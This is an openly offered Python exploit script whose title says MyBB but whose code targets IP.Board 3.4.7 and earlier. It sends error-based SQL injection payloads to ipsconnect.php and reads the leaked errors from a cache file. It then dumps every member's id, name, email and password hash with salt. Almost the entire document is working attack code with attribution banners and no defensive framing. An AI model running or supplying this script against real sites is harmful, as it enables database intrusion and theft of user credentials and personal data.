Exploit MyBB SQLi (blind, error based) By Bekasi X Code

1. #!/usr/bin/env python
2. # Rabu, Juni 03, 2014 - anon.grenxparta@gmail.com
3. # IP.Board <= 3.4.7 SQLi (blind, error based);
4. # you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable
5. # Script Modified by GrenXPaRTa -- Hacktic Labs -- https://www.facebook.com/hackticlabs
6. print '\n\n---------------------------------------------------------------------------------'
7. print 'Script Modified by GrenXPaRTa -- Hacktic Labs -- https://www.facebook.com/hackticlabs'
8. print '---------Script has been modified for different table prefix XXX_members---------'
9. print '---------------------------------------------------------------------------------\n\n\n'
10. url = raw_input('Enter URL http://www.exmaple.com/path_to_ipb :: ')
11. url = url.rstrip('/')
12. ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
13.  
14. import sys, re
15. import urllib2, urllib
16.  
17. def inject(sql):
18.     try:
19.         urllib2.urlopen(urllib2.Request('%s/interface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and updatexml(NULL,concat (0x3a,(%s)),NULL)#\'' % sql), headers={"User-agent": ua}))
20.     except urllib2.HTTPError, e:
21.         if e.code == 503:
22.             data = urllib2.urlopen(urllib2.Request('%s/cache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()
23.             txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
24.             if txt is not None:
25.                 return txt.group(1)
26.             sys.exit('Error [3], received unexpected data:\n%s' % data)
27.         sys.exit('Error [1]')
28.     sys.exit('Error [2]')
29.  
30. def get(name, table, num):
31.     sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
32.     s = int(inject('LENGTH((%s))' % sqli))
33.     if s < 31:
34.         return inject(sqli)
35.     else:
36.         r = ''
37.         for i in range(1, s+1, 31):
38.             r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
39.         return r
40.  
41.  
42. members_table= inject('SeLecT table_name from information_schema.tables where table_schema=database() and table_name REGEXP 0x6d656d6265727324 limit 0,1')
43. n = inject('SELECT COUNT(*) FROM %s' % members_table)
44. print '----------------------------------------------------------------------------'
45. print '* Found %s users' % n
46. print '----------------------------------------------------------------------------'
47. for j in range(int(n)):
48.         print '{:20s} {:20s}'.format('Id',get('member_id', members_table, j))
49.         print '{:20s} {:20s}'.format('Name',get('name', members_table, j))
50.         print '{:20s} {:20s}'.format('Email',get('email', members_table, j))
51.         print '{:20s} {:20s}'.format('Password : Salt',get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', members_table, j))
52.         print '----------------------------------------------------------------------------'